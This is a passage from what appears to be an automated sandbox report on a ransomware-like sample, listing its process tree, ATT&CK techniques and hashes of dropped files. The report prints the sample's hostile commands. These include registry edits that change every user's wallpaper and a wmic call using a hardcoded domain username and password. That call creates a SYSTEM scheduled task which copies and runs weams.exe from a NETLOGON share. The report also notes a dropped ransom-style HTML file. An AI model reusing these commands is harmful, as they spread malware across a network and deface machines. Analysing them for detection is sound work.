    REG ADD "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"
    3⤵
    - Modifies data under HKEY_USERS
    PID:3596
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-19\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4816
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_USERS\S-1-5-19\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"
    3⤵
    - Modifies data under HKEY_USERS
    PID:3536
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-20\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_USERS\S-1-5-20\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"
    3⤵
    - Modifies data under HKEY_USERS
    PID:2484
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_USERS\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"
    3⤵
    - Sets desktop wallpaper using registry
    PID:2464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4200
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_USERS\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"
    3⤵
    - Modifies registry class
    PID:244
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c REG ADD "HKEY_USERS\S-1-5-18\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:216
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKEY_USERS\S-1-5-18\Control Panel\Desktop" /V Wallpaper /T REG_SZ /F /D "C:\Windows\y7K0rN8INAtf.bmp"
    3⤵
    - Modifies data under HKEY_USERS
    PID:208
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c wmic /node:'0.0.0.0' /USER:'BioPlus.net\sqluser2' /PASSWORD:'az21x5t' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz401 /TR 'copy \\BioPlus.net\NETLOGON\weams.exe %windir%lsamp.exe & start %windir%lsamp.exe' & SCHTASKS /run /TN sz401&SCHTASKS /Delete /TN sz401 /F"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4996
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic /node:'0.0.0.0' /USER:'BioPlus.net\sqluser2' /PASSWORD:'az21x5t' process call create "cmd.exe /c schtasks /Create /F /RU System /SC ONLOGON /TN sz401 /TR 'copy \\BioPlus.net\NETLOGON\weams.exe C:\Windowslsamp.exe & start C:\Windowslsamp.exe' & SCHTASKS /run /TN sz401&SCHTASKS /Delete /TN sz401 /F"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2084

C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:5684

C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Public\Desktop\HELP_SECURITY_EVENT.html
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x118,0x128,0x7ffce9e246f8,0x7ffce9e24708,0x7ffce9e24718
  2⤵
  PID:7880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:2
  2⤵
  PID:7904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2292 /prefetch:3
  2⤵
  PID:7796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
  2⤵
  PID:7940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
  2⤵
  PID:4012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1
  2⤵
  PID:7848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5436 /prefetch:1
  2⤵
  PID:6052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
  2⤵
  PID:2592
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5508 /prefetch:8
  2⤵
  PID:2952
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  PID:8168
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff74fe65460,0x7ff74fe65470,0x7ff74fe65480
    3⤵
    PID:5416
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5508 /prefetch:8
  2⤵
  PID:5548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:1
  2⤵
  PID:6064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5836 /prefetch:1
  2⤵
  PID:5816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5456 /prefetch:8
  2⤵
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1072 /prefetch:8
  2⤵
  PID:7672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3388 /prefetch:2
  2⤵
  PID:7084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2156,12406180890437272829,13444645549313187084,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4076 /prefetch:8
  2⤵
  PID:1648

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:7908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:7048

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868

Filesize
471B

MD5
86e6028e0d9bb53f0aa144cd0b81d19d

SHA1
e7fbbd3a81e0b1638eaeee74b6e35e82cc40bfdb

SHA256
6bf2b5a0f717495ea2befcd3e6a3df5f3737e578c80e21a697c5c022fd671ed5

SHA512
aed55627730ecbc388fd62cab8546538521ab20297d45e28abb8088af4e0f160aa7b8bada86ae90281b591682d469417f83b2729438037a0de01ae68ea14739e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868

Filesize
412B

MD5
0194098cb97adcece725cc9a0296b417

SHA1
e1cc4c6db075ad19f7800c78c8e488246de0e53f

SHA256
c5210c1e8a0903c3dba3a571d9490019066e3e72aff26714238bf38939d980e6

SHA512
e1e3e7e3a2be8cc37bdc9527a8d5f4275597e09f07c57b21f53ca10e5bd39f811c2cad188b861229c147a35e2a42dc0e07ea0ef97c3f65ef0dd07910509cc586

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
cd4f5fe0fc0ab6b6df866b9bfb9dd762

SHA1
a6aaed363cd5a7b6910e9b3296c0093b0ac94759

SHA256
3b803b53dbd3d592848fc66e5715f39f6bc02cbc95fb2452cd5822d98c6b8f81

SHA512
7072630ec28cf6a8d5b072555234b5150c1e952138e5cdc29435a6242fda4b4217b81fb57acae927d2b908fa06f36414cb3fab35110d63107141263e3bba9676

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
1d40312629d09d2420e992fdb8a78c1c

SHA1
903950d5ba9d64ec21c9f51264272ca8dfae9540

SHA256
1e7c6aa575c3ec46cd1fdf6df51063113d277012ed28f5f6b37aea95cd3a64ac

SHA512
a7073247ae95e451ed32ceeae91c6638192c15eaad718875c1272eff51c0564016d9f84690543f27df509a7d579de329d101fbf82fed7cbeb27af57393de24ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnk

Filesize
2KB

MD5
ff6d9505f50edaa0c4564d6ea33bd1d0

SHA1
13ae2bb382f211147dcc5b9f37dc1ed692c4bf81

SHA256
5a7d59104e5bb935e93ea8d05e5b1a69fba5e3dd14d447988ebc14d853786f60

SHA512
7eede3fb23168fd4371fb493e8c921b0b31550c700accef02ea16013233be3788a3fc3d737ea1990da2a3d352e7e02b0b74f3aa00726ab73f73bda11d0ef41bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
c75d4f607eb7fcf2a23617861f1e3611

SHA1
686f8aa5096674ecf22c7909a59a811c1bb14627

SHA256
91b606f5fde4e1d04da42d5e3647b9b07fc8c6d5a4206ba855f7f73936e873d0

SHA512
1780f1ac68134a3c31484963e6215464c090b23c5c6af73cdd6c7c0c18554fa7f2a25290cbe8e98ba1d1135db00fd19a6402be015dce79c0b6a764f4bdf9ee65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
4KB

MD5
5063f1867f173ec7b82b2e7c55c90868

SHA1
353695aa4f01a3b717823d160db53fdd2420bf27

SHA256
ef7f672905e76b820144ed8ace9f5759c547782995f87e3e778fbbcd2b7d40a7

SHA512
1b01440990dd34bf1e05ad9a8827d7d34f8aeda5e099128b710183de2929b787e60f9aae93eeddbe1c3b4d2424b15c81009584e549586ffd5e6c96e7427aef46

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
8a1096c84a5ee10d5114e8696b11022f

SHA1
5382349ca025696fe7d6de51aee34bc3e4d0fb96

SHA256
b8d49fe60c43845a8dbfba57cedf1b4b374df522614c2393666860fbc7ff5ea5

SHA512
75c5079b3b92195a578f3db7b621b483eb45082581b1867ade39846aa125b26d16c12cd553a6f753f015cfb6a0f983bc055dfd0abb7345d6c81c360e71146e3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
0316a33600c2e6c960ab68e96f40c2e3

SHA1
4fcad8a269c5adf7515e7a0b3d67b7c4a9ac3adf

SHA256
f23227d5e77fdbf1edf9045165a3b920befbb3f4cfc108d782bca3a9b20a168d

SHA512
21ad2d4c6a977d06166ead040c05970e5903384fa021fe902eda0a6a39770b1df8d04e29fe70f3fe097b0f800bdbae0a7b35ba2fa5baa21fbb234d3a3fe2d974

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
adb8f228b5e6c82507a35906ceb7756d

SHA1
56a87a78546f4ae02491181396c1aac67445ab07

SHA256
29d84e50eb7fd89a1e92ae805520ed73cc988d91836939275518e67e9645fb4a

SHA512
d49173aa518dcdee14a12871157b1d68c9564025dc135ed43e3d45ceb1b481dbb29e3849c67d60857bc8d5cd83fcc7c0f117c4b67b047e5a62cfd05f72773954

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
c21ddd7963f0eb981aac2ee5c9309fad

SHA1
0ea1d4b87549a9466012d4c71a4d6ffec8a6ba21

SHA256
a2cabdf786f447debbb59feb82c187c9733a3c838697d24c192ce141f880586d

SHA512
315ca664a04ad7dc4a5ace81529f3e6ecaad1c364b3f896c37dc71e93fde9e7c0d2187e62940f9ba75e5f038af50e4ff1a49aac049f886150c653d3e8f40ab7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
1463bf2a54e759c40d9ad64228bf7bec

SHA1
2286d0ac3cfa9f9ca6c0df60699af7c49008a41f

SHA256
9b4fd2eea856352d8fff054b51ea5d6141a540ca253a2e4dc28839bc92cbf4df

SHA512
33e0c223b45acac2622790dda4b59a98344a89094c41ffdb2531d7f1c0db86a0ea4f1885fea7c696816aa4ceab46de6837cc081cd8e63e3419d9fcb8c5a0eb66

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
76845282cc7902ed39198ba5e2aea49b

SHA1
2e0dd33bdbfcf86a523b4a44140d6905b8b9ad72

SHA256
83fb22e39d33680ca4849e6914bbbd5562775583245083d2160dd04304f178b4

SHA512
2dd4180d3dc8cfc5cf2344102c800c6c9d806b0a982d6f0cfa7478aafaaafadf9e30855ded1264256934e9c9182a87e4b8ce0cb2214b984c7c523f1b1889a99a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
37d15b49cb5885bda7df74498fb16474

SHA1
c3d9742858e4770d9ea76d35d5c05c3857e4d91e

SHA256
b814dca5cae77f6422a7f1576844badfea9f5c710ee285890e7e929607762405

SHA512
e9eb5ddd03b799c640879ee5ef34c135d1a79e84257b07732d2b182a4eb3329c767e6aec8b5a2e9a6f93c566a224907f5a374651b0675adfc0c5dccf34c14f02

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
914d5fc68c549402ef8addb98a992ef5

SHA1
6d47b924768432a8cafc18a0bf8bc290b6e05566

SHA256
95b7ae540d40289ac0672c5ed96a0067a888c6f4afb1655101ce40c0e202b194

SHA512
ab695ee9381be58193d89c450e9fb9e04802ff23d2278e71bf19f3d313677d8301475aded96c8e09628f36015361e6a14cde7717a3dc01114e8fbfa3fde62b97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
9KB

MD5
d118df2a0f354f7caf9d8b24565aff43

SHA1
7ee234b0ba8f7305841cbd8ae5def835030b2470

SHA256
98156635a61c16f3d0ba6cc88017c7cf786ed974537b19ff6cc8063b8674c99a

SHA512
614e62167d83a7e408504347600d458f48a2939513792a59289470f73bfdc9e1a504f0677a6cb2c0d66da0423a72b80f2c14e50be243e29ab3ea73f826a5ceca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
2e39bf7b6877b4e252daad2106dfd421

SHA1
ee799ad08e8d45852960c5519f590a4b834e5da8

SHA256
65665eaeb2d7dc095d36014ce298d77d4fcae9d36ab61139119e44ebb2ed8a99

SHA512
d1ae11558ec48a6a1c4e48290cff38d271cdd831e3f98aff6b1b5f19aa873240aaf51d39ab6ae24cb4952c8eec4d2b830f5b309a50c0ccbc61661833383989b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
f5c5a6b1224795f47148c154cacc5eae

SHA1
9175d23305980eb71252231428f887fc1f6d166a

SHA256
e348c11f00395381ff214e579bd512e3b2de2c9b983c6cd5b8ea2397d89bbc40

SHA512
6ff928a4c4e4d7e86f269ec504d231a2a7deb7b38fe956b4dd800c9b0375bec5b9fa1dd980592dc611d71a7db5f6b46c6592c1ab620d6c050a3f235ba77981d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db-wal

Filesize
4KB

MD5
d6e02b620e22f4005ffc467aa47763a2

SHA1
8fa1b7cab8ecbafa829aa55f2a302d6b24f850a1

SHA256
13dcaa9d313f8355516c14600ef88cc1a73cc8005d464eb56fc37905d4028622

SHA512
a409c240b6413cba349b52f9b1a6746e9d7dfc12e7f04b47d5268c1f59326be8cedce4a42661ab413c3d19e8c00a66277cd6362bc8590d03b52563d7fb890cc2

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms

Filesize
3KB

MD5
c88abd639f545352b769fa928e608c8d

SHA1
5baa6f71485e43c828c3f960a633d463081b804b

SHA256
4d080e7dbdd31c4ff0e61f322199ebb2d1ebe37cb2d198ec5a6f560ba3f1e16a

SHA512
f27eb0e665a271e7455440da3480a773ab7421b7d589d38072844037f3968c1222df50ed73c694bf53f9a7c06811b68180cb28031fa9063cd15ba2ebb95c8095

Download Submit
C:\Users\Public\Desktop\HELP_SECURITY_EVENT.html

Filesize
26KB

MD5
126ea54fffa02c5c278908c39309366c

SHA1
48041568c8c46f8e1dad65c87997e12d3b41a57e

SHA256
aa50e85c758b7c17b8a44b01c1a212f0d3452fe8e107ce8cfddad6e31e2c9704

SHA512
fa558516e28360409bd102daee6d2b015d33c8450dfe0cb713dc07fe672375729879ead3a75a7bc353d8e81c76cc83e37d16e7b7dcb5890a30058e36a18df08b

Download Submit
C:\Users\Public\Desktop\HELP_SECURITY_EVENT.html

Filesize
26KB

MD5
126ea54fffa02c5c278908c39309366c

SHA1
48041568c8c46f8e1dad65c87997e12d3b41a57e

SHA256
aa50e85c758b7c17b8a44b01c1a212f0d3452fe8e107ce8cfddad6e31e2c9704

SHA512
fa558516e28360409bd102daee6d2b015d33c8450dfe0cb713dc07fe672375729879ead3a75a7bc353d8e81c76cc83e37d16e7b7dcb5890a30058e36a18df08b

Download Submit
memory/5684-1509-0x000002845FAB0000-0x000002845FC59000-memory.dmp

Filesize
1.7MB

Download
memory/5684-1091-0x00007FFCB6330000-0x00007FFCB6340000-memory.dmp

Filesize
64KB

Download
memory/5684-1094-0x00007FFCB6330000-0x00007FFCB6340000-memory.dmp

Filesize
64KB

Download
memory/5684-1048-0x00007FFCB8610000-0x00007FFCB8620000-memory.dmp

Filesize
64KB

Download
memory/5684-1056-0x00007FFCB8610000-0x00007FFCB8620000-memory.dmp

Filesize
64KB

Download
memory/5684-1050-0x00007FFCB8610000-0x00007FFCB8620000-memory.dmp

Filesize
64KB

Download
memory/5832-1510-0x00000205F5FC0000-0x00000205F6169000-memory.dmp

Filesize
1.7MB

Download
memory/5832-1758-0x00007FFCB8610000-0x00007FFCB8620000-memory.dmp

Filesize
64KB

Download
memory/5832-1762-0x00000205F5FC0000-0x00000205F6169000-memory.dmp

Filesize
1.7MB

Download
memory/5832-1761-0x00007FFCB8610000-0x00007FFCB8620000-memory.dmp

Filesize
64KB

Download
